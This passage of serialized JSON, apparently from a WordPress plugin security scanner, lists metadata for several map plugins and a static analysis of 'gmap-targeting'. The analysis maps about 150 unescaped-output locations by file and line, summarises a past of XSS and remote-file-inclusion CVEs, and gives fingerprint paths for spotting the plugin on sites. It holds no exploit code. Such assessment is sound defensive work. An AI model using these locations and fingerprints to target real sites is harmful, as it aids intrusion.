href=\"https:\u002F\u002Fpolicies.google.com\u002Fterms\" rel=\"nofollow ugc\">https:\u002F\u002Fpolicies.google.com\u002Fterms\u003C\u002Fa>. Privacy Policy \u003Ca href=\"https:\u002F\u002Fpolicies.google.com\u002Fprivacy\" rel=\"nofollow ugc\">https:\u002F\u002Fpolicies.google.com\u002Fprivacy\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>This plugin incorporates a license verification mechanism to ensure the authenticity of your license key and provide access to premium features and updates. The verification process involves connecting securely to our external service hosted at BestWebSoft website \u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\" rel=\"nofollow ugc\">https:\u002F\u002Fbestwebsoft.com\u003C\u002Fa>. Privacy Policy \u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fprivacy-policy\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fbestwebsoft.com\u002Fprivacy-policy\u002F\u003C\u002Fa>. End user license agreement \u003Ca href=\"https:\u002F\u002Fbestwebsoft.com\u002Fend-user-license-agreement\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fbestwebsoft.com\u002Fend-user-license-agreement\u002F\u003C\u002Fa>.\u003C\u002Fli>\n\u003C\u002Ful>\n","Generate and add XML sitemap to WordPress website. Help search engines index your blog.",20000,2159997,86,114,"2025-12-03T11:04:00.000Z","6.2",[126,127,128,20,129],"add-pages-to-sitemap","add-posts-to-sitemap","add-sitemap","google-sitemap","https:\u002F\u002Fbestwebsoft.com\u002Fproducts\u002Fwordpress\u002Fplugins\u002Fgoogle-sitemap\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-sitemap-plugin.3.3.5.zip","2017-04-12 00:00:00",{"slug":134,"name":135,"version":136,"author":137,"author_profile":138,"description":139,"short_description":140,"active_installs":141,"downloaded":142,"rating":11,"num_ratings":28,"last_updated":143,"tested_up_to":144,"requires_at_least":145,"requires_php":18,"tags":146,"homepage":18,"download_link":151,"security_score":152,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"contact-page","Contact Page","1.0","Marek","https:\u002F\u002Fprofiles.wordpress.org\u002Fmarekbosman\u002F","\u003Cp>Create a contact page that is easy to maintain, with some special features like fully customizable Google Maps integration and Twitter feed.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Google Maps\u003C\u002Fli>\n\u003Cli>Twitter\u003C\u002Fli>\n\u003Cli>Facebook\u003C\u002Fli>\n\u003Cli>LinkedIn\u003C\u002Fli>\n\u003C\u002Ful>\n","Easily create a contact page with relevant address information, Google Maps, your latest tweets and links to relevant social media profiles.",300,15568,"2012-12-11T15:17:00.000Z","3.5.2","3.0",[147,148,149,23,150],"address","contact","google-maps","twitter","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcontact-page.zip",85,{"slug":154,"name":155,"version":156,"author":157,"author_profile":158,"description":159,"short_description":160,"active_installs":161,"downloaded":162,"rating":13,"num_ratings":14,"last_updated":163,"tested_up_to":16,"requires_at_least":164,"requires_php":99,"tags":165,"homepage":169,"download_link":170,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"alpha-google-map-for-elementor","Alpha Google Map For Elementor","1.4.0","Ali Ali","https:\u002F\u002Fprofiles.wordpress.org\u002Fali7ali\u002F","\u003Cp>This plugin provides essential Google Maps functionalities with additional premium features tailored for Elementor.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Plugin Features:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Custom map pins with hover and active states\u003C\u002Fli>\n\u003Cli>Customizable info-box with image gallery support\u003C\u002Fli>\n\u003Cli>Extensive map controls\u003C\u002Fli>\n\u003Cli>Optional Map ID (Cloud Styling) support with a locale-aware Google Maps loader\u003C\u002Fli>\n\u003Cli>Responsive live editing within Elementor\u003C\u002Fli>\n\u003Cli>Compatibility with the latest Google Maps API standards\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Demo:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Check out the plugin demo \u003Ca href=\"https:\u002F\u002Fali-ali.org\u002Fproject\u002Falpha-google-map-for-elementor\u002F\" rel=\"nofollow ugc\">here\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Contributing and Reporting Bugs:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Contribute on GitHub: \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fali7ali\u002FAlpha-Google-Map-For-Elementor\" rel=\"nofollow ugc\">Alpha-Google-Map-For-Elementor\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Support:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>For community support, use the WordPress.org forums. Report bugs on \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fali7ali\u002FAlpha-Google-Map-For-Elementor\u002Fissues\u002Fnew\u002Fchoose\" rel=\"nofollow ugc\">GitHub Issues\u003C\u002Fa>.\u003C\u002Fp>\n","Alpha Google Map For Elementor offers premium Google Map features for WordPress, enhancing your site with advanced map functionalities.",200,5145,"2026-02-01T07:24:00.000Z","6.0",[166,20,21,167,168],"elementor","maps","page-builder","https:\u002F\u002Fali-ali.org\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Falpha-google-map-for-elementor.zip",{"slug":172,"name":173,"version":174,"author":175,"author_profile":176,"description":177,"short_description":178,"active_installs":13,"downloaded":179,"rating":27,"num_ratings":52,"last_updated":180,"tested_up_to":16,"requires_at_least":181,"requires_php":18,"tags":182,"homepage":187,"download_link":188,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"wc-apg-city","WC – APG City","2.0.4","Art Project Group","https:\u002F\u002Fprofiles.wordpress.org\u002Fartprojectgroup\u002F","\u003Cp>\u003Cstrong>IMPORTANT: \u003Cem>WC – APG City\u003C\u002Fem> isn’t compatible with Microsoft Internet Explorer 11 or earlier.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>WC – APG City\u003C\u002Fstrong> adds to your WooCommerce shop a new automatic city field generated from postcode via GeoNames API or Google Maps API.\u003C\u002Fp>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Fully compatible with the Checkout block in the WordPress block editor.\u003C\u002Fli>\n\u003Cli>Includes a local GeoNames database that is downloaded and updated monthly to improve performance and reduce external API queries.\u003C\u002Fli>\n\u003Cli>You can choose between the GeoNames API or the Google Maps API.\u003C\u002Fli>\n\u003Cli>You must add your own Google Maps API Key or GeoNames username.\u003C\u002Fli>\n\u003Cli>You can customize the default text of the select field.\u003C\u002Fli>\n\u003Cli>You can customize the text of the option used to reload a text field.\u003C\u002Fli>\n\u003Cli>You can block modifications to the city and province (state) fields.\u003C\u002Fli>\n\u003Cli>You can customize the background color of the locked fields.\u003C\u002Fli>\n\u003Cli>If the postal code is shared by more than one city, the customer will be able to select the correct city name from the list returned by GeoNames or Google Maps.\u003C\u002Fli>\n\u003Cli>If the city is not in the list or cannot be found in either API, the customer can manually enter their city name.\u003C\u002Fli>\n\u003Cli>It also selects the province (state), as long as the name matches the one obtained from GeoNames or Google Maps.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Translations\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Español (\u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Art Project Group\u003C\u002Fstrong>\u003C\u002Fa>).\u003C\u002Fli>\n\u003Cli>English (\u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Art Project Group\u003C\u002Fstrong>\u003C\u002Fa>).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Technical support\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>Art Project Group\u003C\u002Fstrong> offers \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002Ftienda\u002Fticket-de-soporte\" rel=\"nofollow ugc\">\u003Cstrong>Technical support\u003C\u002Fstrong>\u003C\u002Fa> to configure or install \u003Cstrong>\u003Cem>WC – APG City\u003C\u002Fem>\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Ch4>Origin\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>WC – APG City\u003C\u002Fstrong> has been programmed at the request of \u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Fprofile.php?id=100010011270290\" rel=\"nofollow ugc\">Thekla Kurpjuweit\u003C\u002Fa> request to add to WooCommerce automatic city name input from the postcode.\u003C\u002Fp>\n\u003Ch4>More information\u003C\u002Fh4>\n\u003Cp>On our official website you can learn more about \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002Fplugins-para-woocommerce\u002Fwc-apg-city\" rel=\"nofollow ugc\">\u003Cstrong>WC – APG City\u003C\u002Fstrong>\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Comments\u003C\u002Fh4>\n\u003Cp>Don’t forget to leave us your comment on:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002Fplugins-para-woocommerce\u002Fwc-apg-city\" rel=\"nofollow ugc\">WC – APG City\u003C\u002Fa> on Art Project Group.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.facebook.com\u002Fartprojectgroup\" rel=\"nofollow ugc\">Art Project Group\u003C\u002Fa> on Facebook.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fx.com\u002Fartprojectgroup\" rel=\"nofollow ugc\">@artprojectgroup\u003C\u002Fa> on X.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>More plugins\u003C\u002Fh4>\n\u003Cp>Remember that you can find more \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002Fplugins-para-wordpress\" rel=\"nofollow ugc\">plugins for WordPress\u003C\u002Fa> and more \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002Fplugins-para-woocommerce\" rel=\"nofollow ugc\">plugins for WooCommerce\u003C\u002Fa> on \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\" rel=\"nofollow ugc\">Art Project Group\u003C\u002Fa> and our profile on \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fartprojectgroup\u002F\" rel=\"nofollow ugc\">WordPress\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>GitHub\u003C\u002Fh4>\n\u003Cp>You can follow the development of this plugin on \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fartprojectgroup\u002Fwc-apg-city\" rel=\"nofollow ugc\">Github\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>Translations\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cem>English\u003C\u002Fem>: by \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Art Project Group\u003C\u002Fstrong>\u003C\u002Fa> (default language).\u003C\u002Fli>\n\u003Cli>\u003Cem>Español\u003C\u002Fem>: por \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Art Project Group\u003C\u002Fstrong>\u003C\u002Fa>.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>Since \u003Cstrong>WC – APG City\u003C\u002Fstrong> is totally free, \u003Cstrong>Art Project Group\u003C\u002Fstrong> only provides payment \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002Ftienda\u002Fticket-de-soporte\" rel=\"nofollow ugc\">\u003Cstrong>Technical Support\u003C\u002Fstrong>\u003C\u002Fa> service. In any case \u003Cstrong>Art Project Group\u003C\u002Fstrong> does not provide any kind of free technical support.\u003C\u002Fp>\n\u003Ch3>Donation\u003C\u002Fh3>\n\u003Cp>Did you like and find \u003Cstrong>WC – APG City\u003C\u002Fstrong> useful on your website? We would appreciate a \u003Ca href=\"https:\u002F\u002Fartprojectgroup.es\u002Ftienda\u002Fdonacion\" rel=\"nofollow ugc\">small donation\u003C\u002Fa> that will help us to continue improving this plugin and create more plugins totally free for the entire WordPress community.\u003C\u002Fp>\n\u003Ch3>Thanks\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>To all that use it.\u003C\u002Fli>\n\u003Cli>All those who help improve it.\u003C\u002Fli>\n\u003Cli>All those who made donations.\u003C\u002Fli>\n\u003Cli>All those who encourage us with their comments.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Thank you very much to all!\u003C\u002Fp>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Col>\n\u003Cli>\n\u003Cp>To the GeoNames services to download and update, on a monthly basis, the full local database of cities and postcodes, as well as to perform queries to its API when there is no information in the local database.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>It sends the country and the postcode.\u003C\u002Fli>\n\u003Cli>More information: https:\u002F\u002Fwww.geonames.org\u002Fexport\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>To the Google Maps API to obtain the city and state\u002Fprovince name from the postcode and country when this option is selected in the plugin settings.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>It sends the country and the postcode.\u003C\u002Fli>\n\u003Cli>More information: https:\u002F\u002Fpolicies.google.com\u002Fprivacy\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Fol>\n","Add to WooCommerce an automatic city name generated from postcode.",7635,"2026-02-10T11:35:00.000Z","5.0",[183,184,149,185,186],"city","geonames","postcode","state","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwc-apg-city\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-apg-city.2.0.4.zip",{"attackSurface":190,"codeSignals":222,"taintFlows":460,"riskAssessment":461,"analyzedAt":476},{"hooks":191,"ajaxHandlers":213,"restRoutes":219,"shortcodes":220,"cronEvents":221,"entryPointCount":14,"unprotectedCount":29},[192,197,200,204,207,210],{"type":193,"name":194,"callback":194,"priority":14,"file":195,"line":196},"action","wp_head","index.php",35,{"type":193,"name":198,"callback":198,"priority":14,"file":195,"line":199},"admin_head",36,{"type":201,"name":202,"callback":202,"file":195,"line":203},"filter","mce_buttons",87,{"type":201,"name":205,"callback":206,"file":195,"line":80},"mce_external_plugins","mce_add_rich_plugins",{"type":193,"name":208,"callback":208,"priority":14,"file":195,"line":209},"init",407,{"type":193,"name":211,"callback":211,"file":195,"line":212},"widgets_init",408,[214],{"action":215,"nopriv":51,"callback":216,"hasNonce":217,"hasCapCheck":217,"file":195,"line":218},"gmap_targeting_get_shortcode_template","get_shortcode_template",true,39,[],[],[],{"dangerousFunctions":223,"sqlUsage":224,"outputEscaping":226,"fileOperations":14,"externalRequests":14,"nonceChecks":14,"capabilityChecks":14,"bundledLibraries":459},[],{"prepared":29,"raw":29,"locations":225},[],{"escaped":48,"rawEcho":227,"locations":228},152,[229,232,234,236,237,239,240,242,244,245,247,248,250,251,253,255,256,258,259,260,261,263,265,266,268,269,270,272,274,276,277,279,280,281,283,285,286,288,289,291,293,294,296,297,298,300,301,303,304,305,307,308,310,311,313,315,317,320,321,322,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,343,345,346,347,349,351,352,353,355,357,358,359,361,363,364,365,367,369,370,372,373,375,377,378,379,380,381,383,384,385,387,389,391,392,393,395,397,398,400,401,403,404,405,407,408,410,411,412,413,414,416,417,418,420,422,424,425,426,428,430,432,433,434,436,438,440,442,443,444,446,448,450,451,453,455,457],{"file":195,"line":230,"context":231},106,"raw output",{"file":195,"line":233,"context":231},123,{"file":195,"line":235,"context":231},218,{"file":195,"line":235,"context":231},{"file":195,"line":238,"context":231},221,{"file":195,"line":238,"context":231},{"file":195,"line":241,"context":231},222,{"file":195,"line":243,"context":231},231,{"file":195,"line":243,"context":231},{"file":195,"line":246,"context":231},235,{"file":195,"line":246,"context":231},{"file":195,"line":249,"context":231},238,{"file":195,"line":249,"context":231},{"file":195,"line":252,"context":231},242,{"file":195,"line":254,"context":231},249,{"file":195,"line":254,"context":231},{"file":195,"line":257,"context":231},252,{"file":195,"line":257,"context":231},{"file":195,"line":257,"context":231},{"file":195,"line":257,"context":231},{"file":195,"line":262,"context":231},253,{"file":195,"line":264,"context":231},260,{"file":195,"line":264,"context":231},{"file":195,"line":267,"context":231},263,{"file":195,"line":267,"context":231},{"file":195,"line":267,"context":231},{"file":195,"line":271,"context":231},264,{"file":195,"line":273,"context":231},265,{"file":195,"line":275,"context":231},272,{"file":195,"line":275,"context":231},{"file":195,"line":278,"context":231},275,{"file":195,"line":278,"context":231},{"file":195,"line":278,"context":231},{"file":195,"line":282,"context":231},279,{"file":195,"line":284,"context":231},285,{"file":195,"line":284,"context":231},{"file":195,"line":287,"context":231},286,{"file":195,"line":287,"context":231},{"file":195,"line":290,"context":231},288,{"file":195,"line":292,"context":231},294,{"file":195,"line":292,"context":231},{"file":195,"line":295,"context":231},298,{"file":195,"line":295,"context":231},{"file":195,"line":295,"context":231},{"file":195,"line":299,"context":231},299,{"file":195,"line":299,"context":231},{"file":195,"line":302,"context":231},301,{"file":195,"line":302,"context":231},{"file":195,"line":302,"context":231},{"file":195,"line":306,"context":231},302,{"file":195,"line":306,"context":231},{"file":195,"line":309,"context":231},304,{"file":195,"line":309,"context":231},{"file":195,"line":312,"context":231},306,{"file":195,"line":314,"context":231},356,{"file":195,"line":316,"context":231},402,{"file":318,"line":319,"context":231},"views\\shortcodes\\gmap_targeting.php",52,{"file":318,"line":319,"context":231},{"file":318,"line":319,"context":231},{"file":318,"line":323,"context":231},56,{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":323,"context":231},{"file":318,"line":334,"context":231},69,{"file":318,"line":334,"context":231},{"file":318,"line":334,"context":231},{"file":318,"line":334,"context":231},{"file":318,"line":334,"context":231},{"file":318,"line":334,"context":231},{"file":341,"line":342,"context":231},"views\\shortcodes\\popups\\gmap_targeting.php",233,{"file":344,"line":52,"context":231},"views\\widget\\google_map.php",{"file":344,"line":48,"context":231},{"file":344,"line":96,"context":231},{"file":348,"line":52,"context":231},"views\\widget\\google_map_form.php",{"file":348,"line":350,"context":231},4,{"file":348,"line":350,"context":231},{"file":348,"line":350,"context":231},{"file":348,"line":354,"context":231},8,{"file":348,"line":356,"context":231},9,{"file":348,"line":356,"context":231},{"file":348,"line":356,"context":231},{"file":348,"line":360,"context":231},13,{"file":348,"line":362,"context":231},14,{"file":348,"line":362,"context":231},{"file":348,"line":362,"context":231},{"file":348,"line":366,"context":231},18,{"file":348,"line":368,"context":231},19,{"file":348,"line":368,"context":231},{"file":348,"line":371,"context":231},27,{"file":348,"line":371,"context":231},{"file":348,"line":374,"context":231},32,{"file":348,"line":376,"context":231},34,{"file":348,"line":196,"context":231},{"file":348,"line":196,"context":231},{"file":348,"line":196,"context":231},{"file":348,"line":218,"context":231},{"file":348,"line":382,"context":231},40,{"file":348,"line":382,"context":231},{"file":348,"line":382,"context":231},{"file":348,"line":386,"context":231},44,{"file":348,"line":388,"context":231},46,{"file":348,"line":390,"context":231},47,{"file":348,"line":390,"context":231},{"file":348,"line":390,"context":231},{"file":348,"line":394,"context":231},53,{"file":348,"line":396,"context":231},54,{"file":348,"line":396,"context":231},{"file":348,"line":399,"context":231},62,{"file":348,"line":399,"context":231},{"file":348,"line":402,"context":231},68,{"file":348,"line":334,"context":231},{"file":348,"line":334,"context":231},{"file":348,"line":406,"context":231},77,{"file":348,"line":406,"context":231},{"file":348,"line":409,"context":231},84,{"file":348,"line":152,"context":231},{"file":348,"line":152,"context":231},{"file":348,"line":108,"context":231},{"file":348,"line":108,"context":231},{"file":348,"line":415,"context":231},107,{"file":348,"line":415,"context":231},{"file":348,"line":415,"context":231},{"file":348,"line":419,"context":231},108,{"file":348,"line":421,"context":231},111,{"file":348,"line":423,"context":231},118,{"file":348,"line":423,"context":231},{"file":348,"line":423,"context":231},{"file":348,"line":427,"context":231},119,{"file":348,"line":429,"context":231},122,{"file":348,"line":431,"context":231},129,{"file":348,"line":431,"context":231},{"file":348,"line":431,"context":231},{"file":348,"line":435,"context":231},130,{"file":348,"line":437,"context":231},134,{"file":348,"line":439,"context":231},135,{"file":348,"line":441,"context":231},136,{"file":348,"line":441,"context":231},{"file":348,"line":441,"context":231},{"file":348,"line":445,"context":231},142,{"file":348,"line":447,"context":231},144,{"file":348,"line":449,"context":231},146,{"file":348,"line":227,"context":231},{"file":348,"line":452,"context":231},154,{"file":348,"line":454,"context":231},155,{"file":348,"line":456,"context":231},157,{"file":348,"line":458,"context":231},158,[],[],{"summary":462,"deductions":463},"The gmap-targeting plugin v1.1.8 exhibits a mixed security posture. While it demonstrates good practices by utilizing prepared statements for all SQL queries and includes nonce and capability checks on its single AJAX entry point, significant concerns arise from its output escaping and historical vulnerability data. Only 3% of outputs are properly escaped, suggesting a high risk of Cross-Site Scripting (XSS) vulnerabilities, especially given the plugin's history of XSS CVEs. The presence of file operations and external HTTP requests, without explicit mention of sanitization in the static analysis, also warrants caution.\n\nThe vulnerability history is a major red flag. The plugin has a past of two high-severity CVEs, including Cross-Site Scripting and PHP Remote File Inclusion, with the most recent recorded vulnerability in 2026. Although currently unpatched CVEs are reported as 0, the recurrence of critical vulnerability types and the relatively recent past vulnerability indicate potential for future exploitable flaws. This history, coupled with the poor output escaping, creates a significant risk profile.\n\nIn conclusion, while the plugin has made some positive strides in secure coding practices like prepared statements and basic authentication checks, the pervasive lack of output escaping and the history of severe vulnerabilities, particularly PHP Remote File Inclusion and XSS, present a substantial security risk. Users should be extremely cautious and ensure the plugin is updated to the latest version, as the historical data suggests a pattern of exploitable weaknesses.",[464,467,469,472,474],{"reason":465,"points":466},"Low output escaping percentage (3%)",15,{"reason":468,"points":466},"History of High severity CVEs (2)",{"reason":470,"points":471},"History of XSS vulnerability type",10,{"reason":473,"points":466},"History of PHP Remote File Inclusion vulnerability type",{"reason":475,"points":471},"Recent vulnerability date (2026-02-05)","2026-03-16T21:23:43.063Z",{"wat":478,"direct":493},{"assetPaths":479,"generatorPatterns":487,"scriptPaths":488,"versionParams":490},[480,481,482,483,484,485,486],"\u002Fwp-content\u002Fplugins\u002Fgmap-targeting\u002Fcss\u002Fadmin.css","\u002Fwp-content\u002Fplugins\u002Fgmap-targeting\u002Fcss\u002Fshortcodes.css","\u002Fwp-content\u002Fplugins\u002Fgmap-targeting\u002Fjs\u002Fadmin.js","\u002Fwp-content\u002Fplugins\u002Fgmap-targeting\u002Fjs\u002Feditor.js","\u002Fwp-content\u002Fplugins\u002Fgmap-targeting\u002Fjs\u002Fwp38\u002Feditor.js","\u002Fwp-content\u002Fplugins\u002Fgmap-targeting\u002Fjs\u002Fpn_popup\u002Fpn_advanced_wp_popup.js","\u002Fwp-content\u002Fplugins\u002Fgmap-targeting\u002Fjs\u002Fpn_popup\u002Fstyles.css",[],[489],"https:\u002F\u002Fmaps.google.com\u002Fmaps\u002Fapi\u002Fjs?sensor=false",[491,492],"gmap-targeting\u002Fstyle.css?ver=","gmap-targeting\u002Fscript.js?ver=",{"cssClasses":494,"htmlComments":496,"htmlAttributes":498,"restEndpoints":500,"jsGlobals":501,"shortcodeOutput":510},[495],"gmap_targeting_icon",[497],"\u003C!-- 05-12-2025 -->",[499],"gmap_targeting",[],[502,503,504,505,506,507,508,509],"gmap_targeting_ajax","pn_gmt_plugin_url","pn_lang_loading","gmt_lang_insert","gmt_lang_popup_title","gmt_lang_made_by","gmt_lang_apply","gmt_lang_close",[511,499],"[gmap_targeting]",{"error":217,"url":513,"statusCode":514,"statusMessage":515,"message":515},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fgmap-targeting\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":29,"versions":517},[]]